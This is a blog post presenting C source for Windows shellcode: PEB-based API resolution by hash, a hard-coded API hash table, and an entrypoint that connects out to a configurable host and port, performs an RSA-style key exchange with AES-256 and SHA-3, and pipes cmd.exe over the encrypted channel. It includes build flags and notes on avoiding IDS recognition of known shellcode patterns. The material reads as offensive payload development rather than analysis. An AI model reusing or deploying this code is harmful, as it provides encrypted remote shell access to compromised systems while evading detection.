Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

Introduction

This won’t be a tutorial on writing shellcode although you might glean something useful from the source code when writing your own PIC in C. This is a PIC (Position Independent Code) for the Windows Operating System written in C with some additional assembly code to handle stack limit issues. There are C arrays of the assembly code for x86 here and for x64 here. You must change the IP address from 127.0.0.1 and port number 1234 if testing for remote systems.

The idea of writing windows shellcodes with C is nothing new and was demonstrated by a number of people already. AFAIK, the first example of this was shown by Didier Stevens in his 2010 article for hakin9 magazine simply called Writing WIN32 Shellcode With a C-compiler.

Nick Harbour also discusses the idea in Writing Shellcode with a C Compiler and Matt Graeber shows how to build a bind shell in his article Writing Optimized Windows Shellcode in C which I’ve borrowed some ideas and code from for my own PIC.

Just this year, a Shellcode Compiler was released which can compile a script into assembly. Of course there are other source codes out there such as this and even a c++ example such as this taking advantage of the constexpr feature.

Apologies to anyone who has been involved with this subject that I missed.

In March this year, I wrote a 4 part series on some simple interactive “shells” for the windows operating system and the PIC client here can be used with this server which is derived from s4.c discussed in Part 4. The main difference is the PIC client and new server both use SHA-3 and AES-256 for authenticated encryption with some modular arithmetic functions to perform key exchange similar to RSA.

Those of you familiar with shellcode found in generators such as Veil, Metasploit or at online shellcode databases like Exploit Database will know they do not use encrypted communication between two hosts except if using WININET API for TLS connections or a static key with RC4.

I’ll just briefly discuss some things that are good to know when writing your own PIC in C for Windows. I’ll continue to update this as code develops.

  1. C or C++?
  2. C or ASM?
  3. Memory layout
  4. Resolving API
  5. Storing strings
  6. CPU intrinsics
  7. Big number arithmetic
  8. Authenticated Encryption
  9. Todo

C or C++?

Those of you familiar with OOP (Object Oriented Programming) languages will know what a class is and the purpose of properties and methods.

C is a POP (Procedure Oriented Programming) language which doesn’t support classes but we can emulate them using structures and the reason I’m using C and not C++ to write a PIC has nothing to do with understanding object oriented concepts. I just feel C++ is too close to Java, .NET and other managed code which all hide a lot of low level code from the programmer.

There are new features of C++ that would be invaluable for developing PICs and I encourage anyone to explore its features and not be dissuaded by my decision to use C instead.

One such feature is the constexpr specifier which is incredibly useful for generating hashes of strings at compile time whereas with C, they need to be hardcoded unless linking with some assembly code containing macros.

A structure is used in my own PIC to emulate a class since most of the functions must be resolved at runtime. This structure is passed to each procedure so that it can access what I’ll refer to in future as global memory.

C or ASM?

Traditionally, shellcodes have always been written in assembly for the target architecture an operating system runs on. As hardware technology advanced over the last 20 years, so did complexity of operating systems and there was also the birth of new languages designed to to be more cost effective for a business. The consequence of these advancements led to fewer and fewer people writing applications in assembly since the hardware no longer suffered limitations of early personal computers.

RAM and ROM space are no longer a factor for the majority of computing devices running an operating system. Compilers are efficient at generating code either optimized for speed or size and high level languages for the most part offer the ability to rapidly develop applications with chance of fewer bugs. Writing assembly today is largely confined to microcomputing devices such as the Atmel AVR 8-bit and 32-bit Microcontrollers.

As someone that’s programmed with both C and ASM on and off for some years now, there was a time when I thought assembly was the only language for writing shellcode. But the kinds of shellcode I was writing back then were very simple and there wasn’t any consideration for information transmitted between two systems being compromised by a third party. So when I decided to try write shellcode that used encryption, i knew there would be a lot of code involved and that it would be a nightmare to debug.

So the codes I wrote in the past were small but this PIC can exceed 5KB once extracted from binary which is something I really wouldn’t want to write by hand, although it’s safe to assume an assembly version is likely to be at least 50% smaller.

For a PIC like this using encryption of packets, it’s certainly doable to implement the entire thing in Assembly but I can imagine it being an unpleasant experience. The purpose of the Asmcodes series was essentially to evaluate potential cryptographic primitives for shellcode.

I think it would be wise to develop a PIC in C first before considering an assembly implementation. Once you’ve ironed out any problems, that will make writing assembly much easier.

Memory layout

A general layout of our global memory is required for data and API addresses. API addresses are likely to consume less space than data so I would recommend placing a structure for API at the very beginning of allocated memory.

For this particular code, we use some (but not all) 28 API which requires 112 bytes on x86 and 224 bytes for x64. I’ll explain later why some are not currently used, it’s mostly for legacy reasons.

They are resolved by 32-bit hash from the PEB (Process Environment Block) that contains among many other things a list of DLL (Dynamic-link Libraries) loaded into our target process.

We identify the variables that will be required to multiple functions and declare these in a structure I’ve simply called v_tbl. (I may need to revise this as some may think it means virtual table)

Pointers to API addresses are stored in a structure call f_tbl and this is then placed inside another structure with v_tbl to define our global memory.

Anyone that’s ever looked at disassembly for a C++ program will notice that each class object or instance of an object is passed to each class method. I’ve adopted a similar approach in C except you can visibly see the parameter passed to each function in source code.

If you’re familiar with object oriented programming, you can view the v_tbl structure as properties of a class and the f_tbl structure as methods. So you might be asking why not just have all memory space in one area? There’s a reason to separate the two and it’s mainly to do with reducing opcode sizes.

In assembly, it would be ideal to store API at start of structure and data variables at end so that we’re accessing the API with the least amount of bytes.

It may be possible to use a free unused or reserved slot in the TEB (Thread Environment Block) or PEB (Process Environment Block) which we can then access from each function through the FS or GS selector depending on version of Windows but I have not investigated this.

Another issue is the use of stack for storing data. cs32.asm and cs64.asm are required to allocate large blocks of stack memory.

As a general rule I would advise you minimize amount of stack allocated to avoid crashing on some systems. In future I will most likely use the heap for global memory instead of stack.

Data structure

The v_tbl represents our variables which are for the most part required by more than one function, but not all. Actually, this could be reduced but it’ll do for now.

// shellcode data structure
typedef struct _sc_v_tbl_t {
  spp_blk             blk;
  SOCKET              s;      // socket
  HANDLE              out1;   // CreateNamedPipe
  HANDLE              in0;    // CreatePipe read
  HANDLE              in1;    // CreatePipe write
  HANDLE              out0;   // CreateFile
  // event handles start here
  HANDLE              evt0;   // WSACreateEvent
  HANDLE              evt1;   // CreateEvent for cmd.exe
  PROCESS_INFORMATION pi;
  DWORD               evt_cnt;
  DWORD               secure;
  HCRYPTPROV          hProv;
  spp_tek             tek;
  aes_ctx             ctx;
} v_tbl;

Code structure

The f_tbl represents our ‘function table’ which is just a structure to hold addresses of each API required by all functions. Even if the application space does not use TCP, the PIC will initialize Windows Sockets before attempting to make an outgoing connection.

// api table structure
typedef struct _sc_f_tbl_t {
  union {
    LPVOID api[28];
    struct {
      // kernel32
      CreateNamedPipe_t                pCreateNamedPipe;
      CreatePipe_t                     pCreatePipe;
      CreateFile_t                     pCreateFile;
      WriteFile_t                      pWriteFile;
      ReadFile_t                       pReadFile;
      GetOverlappedResult_t            pGetOverlappedResult;
      CreateProcess_t                  pCreateProcess;
      TerminateProcess_t               pTerminateProcess;
      CreateEvent_t                    pCreateEvent;
      GetTickCount_t                   pGetTickCount;
      GetLastError_t                   pGetLastError;
      CloseHandle_t                    pCloseHandle;
      WaitForMultipleObjects_t         pWaitForMultipleObjects;
      Wow64DisableWow64FsRedirection_t pWow64DisableWow64FsRedirection;
      GetFileSizeEx_t                  pGetFileSizeEx;
      // ws2_32
      socket_t                         psocket;
      connect_t                        pconnect;
      send_t                           psend;
      recv_t                           precv;
      closesocket_t                    pclosesocket;
      ioctlsocket_t                    pioctlsocket;
      WSAEventSelect_t                 pWSAEventSelect;
      WSAEnumNetworkEvents_t           pWSAEnumNetworkEvents;
      WSACreateEvent_t                 pWSACreateEvent;
      WSAStartup_t                     pWSAStartup;
      // advapi32
      CryptAcquireContextA_t           pCryptAcquireContext;
      CryptGenRandom_t                 pCryptGenRandom;
      CryptReleaseContext_t            pCryptReleaseContext;
    };
  };
} f_tbl;

Both f_tbl and v_tbl are placed in one structure and this represents our global memory.

typedef struct sc_tbl_t {
  f_tbl f; // function table  (code section)
  v_tbl v; // variables table (data section)
} sc_tbl;

Resolving API

A clever and clean way to resolve and invoke an API which is now part of the Metasploit project is originally based on this shellcode for windows which was used for a CTF by some Spanish dudes in July 2008 well before it was modified and added to Metasploit repository.

While it’s a neat way to call API, some IDS software now easily recognize this as being shellcode and so I’ve reverted back to the traditional method of calling API from C using code based on GetProcAddressWithHash.h from Matt Graeber’s PIC_Bindshell which can also support resolving 64-bit API.

The main modification is how hash of DLL is generated and resolving forward references. Instead of using the Unicode string of DLL in PEB, it’s calculated from the DLL header. In addition to this, if we have a forward reference, a new hash for DLL and API is generated before attempting to resolve.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, i, j;
  DWORD                    idx, rva, api_h, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll, p;
  LPVOID                   api_adr=0;
  CHAR                     dll_name[64], api_name[128];
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    // calculate hash of DLL string
    dll_h = api_hash(dll);
    
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // add to DLL hash and compare
      if (api_hash(api)+dll_h == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        // is this a forward reference?
        if ((PBYTE)api_adr >= (PBYTE)exp &&
            (PBYTE)api_adr <  (PBYTE)exp + 
            dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
        {
          DEBUG_PRINT("%08X is forwarded to %s", 
              dwHash, api_adr);
              
          // copy DLL name to buffer
          for (i=0, p=api_adr; p[i] != 0 && 
              i < sizeof(dll_name)-4; i++) 
          {
            dll_name[i] = p[i];
            if (p[i] == '.') break;
          }
          dll_name[i+1] = 'D';
          dll_name[i+2] = 'L';
          dll_name[i+3] = 'L';
          dll_name[i+4] = 0;
          // copy API name to buffer
          for(j=0; p[++i] != 0 && 
              j < sizeof(api_name)-1; j++) 
          { 
            api_name[j] = p[i]; 
          }
          api_name[j] = 0;
          // calculate hash for DLL and API
          dll_h = api_hash(dll_name);
          api_h = api_hash(api_name);
          DEBUG_PRINT("hash for %s and %s = %08X", 
              dll_name, api_name, dll_h + api_h);
          // now try again
          api_adr = getapi(dll_h + api_h);
          // if we don't have at this point, bail out.
        }
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

The initialization resolves a table of API hashes and stores in f_tbl on the stack.

/**F*********************************************
 *
 * entrypoint of PIC
 *
 ************************************************/
#ifdef XALONE
void mainCRTStartup(void)
#else
void entrypoint(void)
#endif
{
  WSADATA            wsa;
  struct sockaddr_in sin;
  sc_tbl             x;
  DWORD              i, cnt;
  int                r;
  char               ws2_32[]={'w','s','2','_','3','2','\0'};
  char               adv_32[]={'a','d','v','a','p','i','3','2','\0'};
  LoadLibrary_t      pLoadLibrary;

  DWORD api_tbl[28] = 
{ // kernel32
  0x9B1D3EA9, 0xE6FA65BF, 0x0BEEEE0C, 0xD7F74F5F,
  0xE0E73F55, 0x5874B33B, 0xB6A0D8D1, 0x09228FC6,
  0xC0F188F0, 0xA7C0D163, 0x2608EFA5, 0x9FEA6E52,
  0xB4682C63, 0xCA1BB2C6, 0x727CC43E,
  // ws2_32
  0x9D920334, 0xB50DF1B2, 0x3DD3116A, 0x3B7B117C,
  0xCE2971AD, 0x424589CE, 0x929726BE, 0x272C063F,
  0x26EF0516, 0xB0E0E991,
  // advapi32
  0x86904799, 0xBD78D522, 0xB635E033 };
  
  // zero initialize memory
  memset ((uint8_t*)&x, 0, sizeof(x));
  
  // load required modules just in case unavailable in PEB
  // get address for LoadlibraryA
  pLoadLibrary=(LoadLibrary_t)getapi(0x7C3B28ED);
  
  // load ws2_32 
  pLoadLibrary(ws2_32);
  
  // load advapi32
  pLoadLibrary(adv_32);
  
  // resolve our api addresses
  for (i=0; i<sizeof(api_tbl)/sizeof(DWORD); i++) {
    x.f.api[i]=getapi(api_tbl[i]);
    if (x.f.api[i] == NULL) {
      DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
          api_tbl[i]);
      //return;
    }
  }
  
  // initialize winsock
  x.f.pWSAStartup (MAKEWORD(2, 2), &wsa);
  
  // initialize crypto
  x.v.hProv=0;
  
  x.f.pCryptAcquireContext (&x.v.hProv, 
      NULL, NULL, PROV_RSA_AES, 
      CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
      
  // create tcp socket
  x.v.s=x.f.psocket (AF_INET, 
      SOCK_STREAM, IPPROTO_TCP);
      
  // initialize network address, this requires changing before deployment
  sin.sin_port             = HTONS(1234);
  sin.sin_family           = AF_INET;
  sin.sin_addr.S_un.S_addr = 0x0100007F; // 127.0.0.1
  
  // connect to server
  r=x.f.pconnect (x.v.s, 
      (const struct sockaddr*)&sin, sizeof (sin));
  
  if (!r)
  {
    // perform key exchange
    key_xchg(&x);
    // execute dispatcher
    dispatch(&x);
  }
  // close socket
  x.f.pclosesocket (x.v.s);
  // release crypto context
  x.f.pCryptReleaseContext(x.v.hProv, 0);
  
  // cleanup and exit, not used in final code
  //WSACleanup();
  //return 0;
}

API hash algorithm

The api_hash algorithm used in shellcode uses exact same as that found in metasploit except the strings are converted to lowercase before hashing. Although the following works, it is exceptionally slower and delays running shellcode resolving API up to 10 seconds on my system.

// generate sha3-256 hash of dll and api
uint32_t api_hash(char dll[], char api[])
{ 
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX ctx;
  int      i;
  char     c;
  uint8_t  f[64+1]; 
  uint32_t s = 0x9e3779b9UL; // change to something unique
    
  SHA3_Init(&ctx, SHA3_256);         // create 256-bit hash
  SHA3_Update(&ctx, &s, sizeof(s));  // unique secret

  // copy dll converted to lowercase
  for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
    f[i] = (dll[i] | 0x20);
  }
  f[i] = 0;
  SHA3_Update(&ctx, f, i);
  SHA3_Update(&ctx, api, strlen(api));
  SHA3_Final(h.b, &ctx);
  
  // only return the first 32-bits
  return h.w[0];
}

If there’s a way to shorten time require to resolve hashes using SHA-3, I’ll add it later.
Here’s the new getapi function with sha3 hashing included but again it’s too slow.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, ofs=0, idx, rva, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll;
  LPVOID                   api_adr=0;
  
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX                 ctx1, ctx2;
  int                      i;
  uint8_t                  f[64+1]; 
  uint32_t                 s = 0x9e3779b9UL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    SHA3_Init(&ctx1, SHA3_256);   // create 256-bit hash
    SHA3_Update(&ctx1, &s, sizeof(s));  // unique secret

    // copy dll converted to lowercase
    for (i=0; dll[i] != 0 && i<sizeof(f)-1; i++) {
      f[i] = (dll[i] | 0x20);
    }
    f[i] = 0;
    SHA3_Update(&ctx1, f, i);
  
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // update context with api
      for (i=0; api[i] != 0; i++);
      memcpy ((uint8_t*)&ctx2, (uint8_t*)&ctx1, sizeof(SHA3_CTX));
      SHA3_Update(&ctx2, api, i);
      SHA3_Final(h.b, &ctx2);
      // add to DLL hash and compare
      if (h.w[0] == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

Storing strings

Strings must be stored as character arrays otherwise the compiler will automatically store the string and a pointer to it in the data section which we must avoid for a PIC. For example, this PIC requires socket API from ws2_32.dll and crypto API from advapi32.dll but sometimes these are not already loaded in memory. The PIC will load these 2 libraries before trying to resolve any other API at runtime which requires their names be passed to LoadLibrary API.

char ws2_32[]={'w','s','2','_','3','2','\0'};
char adv_32[]={'a','d','v','a','p','i','3','2','\0'};

CPU intrinsics

Even with /Os flag, sometimes the MSVC compiler will think you’re silly and automatically replace FOR loops with memset or memcpy depending on what the loop does. It’s slightly annoying because if I wanted to use memset or memcpy, I’d use them. Since these are external C library functions, I usually have to replace some FOR loops with intrinsics.

You could of course include your own implementation of memset and memcmp functions which might be a better idea but what I normally do is try using the intrinsic directive which should automatically use STOSB/STOSD for memset, MOVSB/MOVSD for memcpy and CMPSB/CMPSD for memcmp.

#pragma intrinsic(memcmp, memcpy, memset)

However, Microsoft has this to say:

The compiler may call the function and not replace the function call with inline instructions, if it will result in better performance.

If the compiler still doesn’t play ball, I’ll define the following.

#define memcpy(x,y,z) __movsb(x,y,z)
#define memmove(x,y,z) __movsb(x,y,z)
#define memset(x,y,z) __stosb(x,y,z)

This usually fixes the issue but when the compiler is stubborn and refuses to substitute memset/memcpy I replace both C functions with either __stosb or __movsb directly.

If all that fails! Consider using an older version of MSVC or try mingw. I’m using MSVC 2010 and believe MSVC 2013 and later versions have dropped support for replacing memcmp with REP CMPSB even when /Os is used.

Any other problems might be related to bit rotations used for encryption operations although any decent compiler will avoid using SHR/SHL/OR to perform a bit rotation. When it doubt, try using _rotl or _rotr. For byte swapping use _bswap (INTEL compiler) or _byteswap_ulong (MSVC).

Include the following if switching between MSVC or INTEL compiler.

#ifdef _MSC_VER
#include <intrin.h>
#else
#include <x86intrin.h>
#endif

Compiler Flags

The only flags I’ve used attempt to reduce code and omit stack security checking.

@echo off
yasm -fwin32 cs32.asm -ocs32.obj
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- aes.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- sha3.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- modexp.c
cl.exe -c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS- -DXALONE spz.c
link /order:@order.txt /base:0 spz.obj sha3.obj aes.obj modexp.obj cs32.obj -subsystem:console -nodefaultlib kernel32.lib -stack:0x100000,0x100000
xbin spz.exe .text
del *.obj

Assembly macros for calculating hashes

Assemblers with macro support provide a way to compute hashes of strings at assembly time. The earliest examples of this were demonstrated in viruses computing CRC hashes of API strings.

The following macro for example is from a virus writer Vecna and based on algorithm originally proposed by LSD-PL in their winasm paper back in 2002.

hash_string macro s
  hash = 0
  len  = 0

  irpc c, <s>
    len = len + 1
  endm
  
  i = 0
  
  irpc c, <s>
    if i ne 0
      if i ne (len-1)
        hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
        hash = hash xor '&c'
      endif
    endif
    i = i + 1
  endm
endm

An even more clever way to generate MD5 hashes of strings was demonstrated by talented coder drizz. The source of this is too complicated to include here but for those curious, have a look here.

Arithmetic Functions for large integers

The public key cryptography we’re mostly familiar with today use big number libraries to perform computations necessary to protect information.

Most sane people will use a well established cryptography library to do all this but since our PIC can’t depend on any libraries we need to implement our own routines.

But it’s not all bad. In comparison to Elliptic Curve and Lattice based encryption, RSA or Diffie Hellman only uses modular arithmetic which requires large keys but requires the least amount of code. As demonstrated here, a modexp function for x86 can be implemented in 140 bytes!

There’s no Karatsuba or Montgomery multiplication used since our goal is to reduce code much as possible and that means keeping it simple.

See modexp.c for functions that perform Modular Exponentiation.

There’s a paper published in 2007 that discusses an encrypted payload similar to what I discuss here. An Encrypted Payload Protocol and Target-Side Scripting Engine by Dino Dai Zovi describes a payload using RC4 for symmetric encryption and ElGamal for key agreement however no source code for this was ever released.

Dino states the total size of Modular Exponentiation was approx. 1200 bytes which sounds about right if using bit shifting and addition instead of just addition. Remember: shifting left by 1 is the same as multiplying by 2 or simply adding value to itself. šŸ˜‰

Authenticated Encryption

It would appear using AEAD (Authenticated Encryption Associated Data) for packet encryption will become a standard eventually. TLS 1.3 will use only AEAD algorithms and I would expect other protocols to follow suit. Actually, 6 authenticated encryption modes (OCB 2.0, Key Wrap, CCM, EAX, Encrypt-then-MAC (EtM), and GCM) have been standardized in ISO/IEC 19772:2009 although it’s not clear what will be used in future.

The PIC uses an EtM (Encrypt Then MAC) scheme in order to reduce code but I have examined a few of the CAESAR submissions and think Ketje from some of the same authors behind Rijndael and Keccak looks good.

SHA-3 256-bit truncated to 96-bits provides integrity of encrypted packets. The hash is appended to end of 16-byte aligned ciphertext before being transmitted.

On the receiving end, we use the same key to generate MAC and compare with 96-bis we’ve received. If they match, we can presume it was sent by trusted party.

/**F*********************************************
 *
 * Generate MAC of SPP data
 *
 ************************************************/
VOID spp_mac(sc_tbl *x, DWORD inlen, PBYTE out)
{
  SHA3_CTX c;
  BYTE     m[SHA3_256];
  
  SHA3_Init(&c, SHA3_256);                       // initialize
  SHA3_Update(&c, x->v.tek.mkey, SPP_MKEY_LEN);  // add mac key
  SHA3_Update(&c, x->v.blk.buf, inlen);          // add data
  SHA3_Final(m, &c);                             // save
  
  memcpy(out, m, SPP_MAC_LEN);
}

Todo

The PIC client is susceptible to a MitM (Man In The Middle) attack because it does not verify if the public key sent by a server is from a trusted party. We can solve this by signing the public key or simply embedding one within the PIC before deployment avoiding the need to receive one at all.

Summary

Using C or C++ to write PICs that can run on multiple architectures makes more sense than writing each PIC in pure assembly. However, I would point out up to 50-60% of code can be reduced when PIC is written in pure assembly and so it’s not obsolete just yet!

I hope based on sources, more research will be done into using C for writing PICs and that it is more appealing than writing in pure assembly.

See sources here

This entry was posted in assembly, cryptography, diffie hellman merkle, networking, programming, public key exchange, security, shellcode, windows and tagged , , , , , , , . Bookmark the permalink.

1 Response to Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

  1. veddy says:

    nice tutorial, where i can download very basic assembly programming at ? im blind on asm but wanna learn it and running on linux. if u can give me a hand, pls send sum link or ebook on my email. thank you

    Like

Leave a comment